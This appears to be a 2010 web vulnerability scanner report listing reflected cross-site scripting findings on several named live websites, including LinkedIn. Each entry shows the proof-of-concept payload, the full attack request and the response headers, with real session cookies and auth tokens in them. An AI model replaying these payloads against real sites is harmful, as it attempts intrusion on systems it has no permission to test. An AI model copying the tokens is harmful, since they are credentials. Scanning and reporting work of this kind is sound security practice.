The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b2d4<img%20src%3da%20onerror%3dalert(1)>be3db197f1a was submitted in the REST URL parameter 1. This input was echoed as 2b2d4<img src=a onerror=alert(1)>be3db197f1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /facebook-login2b2d4<img%20src%3da%20onerror%3dalert(1)>be3db197f1a HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:55:01 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=92050D0601E1BC668FDB4EC1ABDAA86B.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:58:13 GMT; Path=/ Content-Length: 74
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 772ac<img%20src%3da%20onerror%3dalert(1)>b29251ff8a1 was submitted in the REST URL parameter 1. This input was echoed as 772ac<img src=a onerror=alert(1)>b29251ff8a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /forgot-password772ac<img%20src%3da%20onerror%3dalert(1)>b29251ff8a1 HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:54:35 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=DFBA9BDA2F6D2A28627EC25EC9CA2161.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:57:47 GMT; Path=/ Content-Length: 75
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4744f<img%20src%3da%20onerror%3dalert(1)>fc8836a3a60 was submitted in the REST URL parameter 1. This input was echoed as 4744f<img src=a onerror=alert(1)>fc8836a3a60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /j_spring_security_check4744f<img%20src%3da%20onerror%3dalert(1)>fc8836a3a60 HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:54:53 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=9A5B15CA98F87264FCDE940166275E1B.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:58:05 GMT; Path=/ Content-Length: 83
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 24f51<img%20src%3da%20onerror%3dalert(1)>d783beb3494 was submitted in the REST URL parameter 1. This input was echoed as 24f51<img src=a onerror=alert(1)>d783beb3494 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /privacy24f51<img%20src%3da%20onerror%3dalert(1)>d783beb3494 HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:53:44 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=4806B5019D14BA0835BFCBD8CF877D37.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:56:56 GMT; Path=/ Content-Length: 67
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9e2b<img%20src%3da%20onerror%3dalert(1)>1b4ed707cc was submitted in the REST URL parameter 1. This input was echoed as f9e2b<img src=a onerror=alert(1)>1b4ed707cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /rf9e2b<img%20src%3da%20onerror%3dalert(1)>1b4ed707cc HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:51:52 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=5CA8A4D914691121FC393E508C477F4E.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:55:04 GMT; Path=/ Content-Length: 60
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51740<img%20src%3da%20onerror%3dalert(1)>dd7d4c8da25 was submitted in the REST URL parameter 1. This input was echoed as 51740<img src=a onerror=alert(1)>dd7d4c8da25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sb51740<img%20src%3da%20onerror%3dalert(1)>dd7d4c8da25 HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:50:56 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=2EB6E83955C5804D3BB10197364ACA52.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:54:08 GMT; Path=/ Content-Length: 62
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a310c<img%20src%3da%20onerror%3dalert(1)>476d0e05a76 was submitted in the REST URL parameter 1. This input was echoed as a310c<img src=a onerror=alert(1)>476d0e05a76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sba310c<img%20src%3da%20onerror%3dalert(1)>476d0e05a76/ HTTP/1.1 Host: www.gotdailydeals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ae842<img%20src%3da%20onerror%3dalert(1)>d89460aad33 was submitted in the REST URL parameter 1. This input was echoed as ae842<img src=a onerror=alert(1)>d89460aad33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /subscribeae842<img%20src%3da%20onerror%3dalert(1)>d89460aad33 HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:54:53 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=139F635B24AD6529BA964336CEE61E5D.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:58:05 GMT; Path=/ Content-Length: 69
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61294<img%20src%3da%20onerror%3dalert(1)>c80331e3f3c was submitted in the REST URL parameter 1. This input was echoed as 61294<img src=a onerror=alert(1)>c80331e3f3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tou61294<img%20src%3da%20onerror%3dalert(1)>c80331e3f3c HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:53:07 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=4ECA3FB8E749F2155B4625A58FD1A41D.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:56:19 GMT; Path=/ Content-Length: 63
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3657d<img%20src%3da%20onerror%3dalert(1)>4d249cbba51 was submitted in the REST URL parameter 2. This input was echoed as 3657d<img src=a onerror=alert(1)>4d249cbba51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /widgets/sbpromo3657d<img%20src%3da%20onerror%3dalert(1)>4d249cbba51 HTTP/1.1 Host: www.gotdailydeals.com Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 00:44:37 GMT Content-Type: text/html;charset=utf-8 Connection: keep-alive Content-Length: 80
Could not find the template: sbpromo3657d<img src=a onerror=alert(1)>4d249cbba51
4.265. http://www.kledy.de/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kledy.de
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21f0b"><script>alert(1)</script>88d7309f779 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?21f0b"><script>alert(1)</script>88d7309f779=1 HTTP/1.1 Host: www.kledy.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... <a href="?page=2&21f0b"><script>alert(1)</script>88d7309f779=1" class="pages"> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5a973<script>alert(1)</script>7daff1e3d1a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /company/api/recommendation/count?type=PDCT&id={PRODUCT_ID}&callback={CALLBACK}5a973<script>alert(1)</script>7daff1e3d1a HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:8XxGwg3YRVicIzvLNkgDYNZCh-48PRwUJTgW6-3HpVJ821h2lRUUmN:1291788303:ea329ed8082db683332ab0faabadcf47d5e94acc"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:02 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/javascript;charset=UTF-8 Content-Language: en-US Content-Length: 54 Date: Wed, 08 Dec 2010 06:05:02 GMT
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8fde'-alert(1)-'a99a27b930d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /uase8fde'-alert(1)-'a99a27b930d/connect/logout HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:Znm51HR3XEBl__-t6f1phW0quoBKN2hGYXMPAcA7FEW_gc-D6CnGfw:1291788325:32d68211411ff2e0e766cc2bb9a8b4c170d01a5f"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:24 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 1008 Date: Wed, 08 Dec 2010 06:05:24 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1920ba45525d5f4f58455e445a4a4229a3;expires=Wed, 08-Dec-2010 06:35:11 GMT;path=/;httponly
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d586'-alert(1)-'1f1309e7d43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /uas7d586'-alert(1)-'1f1309e7d43/connect/user-signin HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:ZJax0Fz9w3zoVDl_63a8JOLLJ9RkYhL_x9OTmUReYlLZEV8lvfXxOk:1291788329:17f78c2d2a3ddff5e5c4a2427a67fa43dac15e3a"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:28 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 1023 Date: Wed, 08 Dec 2010 06:05:29 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19208245525d5f4f58455e445a4a4229a3;expires=Wed, 08-Dec-2010 06:35:15 GMT;path=/;httponly
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60433'-alert(1)-'75daf4e8920 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /uas60433'-alert(1)-'75daf4e8920/js/authuserspace HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:9aLFNYoZ2p5YT9y3IKLnQGsxSB1HgnHRI0Lp-jI_sD5yBUG3sSoZqS:1291788322:0fb9f795d5ac7180da759bf85d531cc1e88f02f2"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:21 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 1014 Date: Wed, 08 Dec 2010 06:05:21 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf195e6945525d5f4f58455e445a4a4229a3;expires=Wed, 08-Dec-2010 06:35:07 GMT;path=/;httponly
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bacc'-alert(1)-'d6fd20ee539 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /uas7bacc'-alert(1)-'d6fd20ee539/js/userspace HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:8XmmWZ9s7Q6Qw-2-ifO4ATffzSExyyNJE91Cqrfedl6Txy2Bn7hSCd:1291788319:372ec7802f575f43695457184630255da5e833ee"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:18 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 1002 Date: Wed, 08 Dec 2010 06:05:18 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19209045525d5f4f58455e445a4a4229a3;expires=Wed, 08-Dec-2010 06:35:05 GMT;path=/;httponly
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bd13'-alert(1)-'8352e87b04a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /uas8bd13'-alert(1)-'8352e87b04a/oauth2/authorize HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:8GoKMGFbZUFIGRKfogxEKGbJy8SIqffLExNZrdXbl3F2u30f7mgodA:1291788335:aff235b8533c1883201dceff364b5bf6391209e2"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:34 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 1014 Date: Wed, 08 Dec 2010 06:05:34 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1920b445525d5f4f58455e445a4a4229a3;expires=Wed, 08-Dec-2010 06:35:21 GMT;path=/;httponly
4.272. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mathias-bank.de
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc53b"><script>alert(1)</script>c2312ffc5b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc53b\"><script>alert(1)</script>c2312ffc5b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?dc53b"><script>alert(1)</script>c2312ffc5b5=1 HTTP/1.1 Host: www.mathias-bank.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 06:03:54 GMT Server: Apache/2.2.8 (Ubuntu) X-Powered-By: PHP/5.2.4-2ubuntu5.12 X-Pingback: http://www.mathias-bank.de/xmlrpc.php Set-Cookie: bb2_screener_=1291788235+174.121.222.18; path=/ Set-Cookie: PHPSESSID=cb0368b6825d4db60b25842eaac87799; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <a href="/?dc53b\"><script>alert(1)</script>c2312ffc5b5=1/lang-pref/en/"> ...[SNIP]...
4.273. http://www.netvouz.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.netvouz.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c150d"><script>alert(1)</script>654dba14884 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
